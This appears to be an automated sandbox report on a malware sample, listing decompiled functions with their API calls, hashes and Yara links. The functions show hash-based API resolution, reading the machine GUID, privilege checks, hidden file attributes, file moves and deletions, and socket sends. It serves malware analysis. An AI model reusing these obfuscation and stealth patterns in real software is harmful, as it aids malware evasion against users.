                      Uniqueness Score: -1.00%

                      Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                      0x00402c10
                      0x00402c15
                      0x00402c1b
                      0x00402c1e

                      APIs
                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: AddressProc
                      • String ID: s1@
                      • API String ID: 190572456-427247929
                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                      0x00404a56
                      0x00404a65
                      0x00404a6a
                      0x00404ad1
                      0x00404ad1
                      0x00404a6c
                      0x00404a71
                      0x00404a79
                      0x00404a85
                      0x00404a9a
                      0x00404a9e
                      0x00404acb
                      0x00000000
                      0x00404aa0
                      0x00404aac
                      0x00404abc
                      0x00404ac1
                      0x00404ac6
                      0x00404ac6
                      0x00404a9e
                      0x00404ad9

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                      • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateOpenProcessQueryValue
                      • String ID:
                      • API String ID: 1425999871-0
                      • Opcode ID: e0d56cbca6bd2c41456a100c1da91b3779818fb1061ffb83df1f35de1339e345
                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                      • Opcode Fuzzy Hash: e0d56cbca6bd2c41456a100c1da91b3779818fb1061ffb83df1f35de1339e345
                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00220DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNELBASE(00000400,?,?,00220223,?,?), ref: 00220E02
                      • SetErrorMode.KERNELBASE(00000000,?,?,00220223,?,?), ref: 00220E07
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: ddac53debe0c429e99d3ecec711187ada2feab7ef0d0e6c3611846ad14149168
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: 37D0123114512C77D7002ED4DC09BCDBB1C9F05B66F008011FB0DD9181C7709D5046E5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                      Download Yara Rule
                      C-Code - Quality: 40%
                      			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                      0x004060c6
                      0x004060d5
                      0x004060d8
                      0x004060f4
                      0x004060f6
                      0x004060fb
                      0x0040610a
                      0x00406115
                      0x0040611c
                      0x0040611e
                      0x00406121
                      0x00000000
                      0x0040612a
                      0x0040612f

                      APIs
                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: CheckMembershipToken
                      • String ID:
                      • API String ID: 1351025785-0
                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0092959E, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • Module32First.KERNEL32(00000000,00000224), ref: 009295E6
                      Memory Dump Source
                      • Source File: 00000004.00000002.664443157.0000000000928000.00000040.00000001.sdmp, Offset: 00928000, based on PE: false
                      Similarity
                      • API ID: FirstModule32
                      • String ID:
                      • API String ID: 3757679902-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: c3ea6a96f03831e826d82ff6236042eebb3473608cac093d5b74f8ec0be049f8
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: BAF062312007216FD7213BF5A88DF6A76ECAF49724F100568FA56910C4DA70EC454A61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404056, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                      Download Yara Rule
                      C-Code - Quality: 75%
                      			E00404056(void* __ebx, intOrPtr _a4) {
				intOrPtr* _t5;
				void* _t6;
				void* _t14;

				_t14 = E00402B7C(0x208);
				if(_t14 == 0) {
					L4:
					return 0;
				}
				E00402B4E(_t14, 0, 0x208);
				_t5 = E004031E5(__ebx, 0xa, 0xc7f71852, 0, 0);
				_t6 =  *_t5(0, _a4, 0, 0, _t14); // executed
				if(_t6 != 0) {
					E00402BAB(_t14);
					goto L4;
				}
				return _t14;
			}






                      0x00404066
                      0x0040406b
                      0x004040a0
                      0x00000000
                      0x004040a0
                      0x00404072
                      0x00404083
                      0x0040408f
                      0x00404093
                      0x0040409a
                      0x00000000
                      0x0040409f
                      0x00000000

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateFolderPathProcess
                      • String ID:
                      • API String ID: 398210565-0
                      • Opcode ID: a1a24719e67dbc5f14894d7a363877ca7aed04d69b5a6c683f2ee4235101e880
                      • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                      • Opcode Fuzzy Hash: a1a24719e67dbc5f14894d7a363877ca7aed04d69b5a6c683f2ee4235101e880
                      • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                      0x00403c68
                      0x00403c70
                      0x00403c78
                      0x00403c82
                      0x00403c8b
                      0x00403c8f
                      0x00403c72
                      0x00403c76
                      0x00403c76

                      APIs
                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: CreateDirectory
                      • String ID:
                      • API String ID: 4241100979-0
                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                      0x0040643c
                      0x00406445
                      0x00406454

                      APIs
                      • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004044A7, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004044A7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				long _t9;
				void* _t10;

				E004031E5(_t10, 0, 0xf66be5a2, 0, 0);
				_t9 = GetPrivateProfileStringW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t9;
			}





                      0x004044b4
                      0x004044cb
                      0x004044ce

                      APIs
                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: PrivateProfileString
                      • String ID:
                      • API String ID: 1096422788-0
                      • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                      • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                      • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                      • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004049B3, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004049B3(void* _a4, WCHAR* _a8, WCHAR* _a12, DWORD* _a16, void* _a20, DWORD* _a24) {
				int _t8;
				void* _t9;

				E004031E5(_t9, 2, 0xdc1011d7, 0, 0);
				_t8 = SHGetValueW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t8;
			}





                      0x004049c1
                      0x004049d8
                      0x004049db

                      APIs
                      • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Value
                      • String ID:
                      • API String ID: 3702945584-0
                      • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                      • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                      • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                      • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                      0x00404eed
                      0x00404ef2
                      0x00404efd
                      0x00404efd
                      0x00404f07
                      0x00404f0e

                      APIs
                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: send
                      • String ID:
                      • API String ID: 2809346765-0
                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004049DC, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004049DC(void* _a4, int _a8, WCHAR* _a12, DWORD* _a16) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 2, 0xeca4834b, 0, 0);
				_t6 = SHEnumKeyExW(_a4, _a8, _a12, _a16); // executed
				return _t6;
			}





                      0x004049ea
                      0x004049fb
                      0x004049fe

                      APIs
                      • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Enum
                      • String ID:
                      • API String ID: 2928410991-0
                      • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                      • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                      • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                      • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                      0x00403bdd
                      0x00403beb
                      0x00403bee

                      APIs
                      • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                      Download Yara Rule
                      APIs
                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                      0x0040428a
                      0x00404297
                      0x0040429a

                      APIs
                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                      0x00404a27
                      0x00404a35
                      0x00404a38

                      APIs
                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                      0x00403c15
                      0x00403c1d
                      0x00403c20

                      APIs
                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                      0x00402c2c
                      0x00402c34
                      0x00402c37

                      APIs
                      • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00408B2C, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00408B2C(struct HINSTANCE__* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe0cf5891, 0, 0);
				_t4 = FreeLibrary(_a4); // executed
				return _t4;
			}





                      0x00408b39
                      0x00408b41
                      0x00408b44

                      APIs
                      • FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
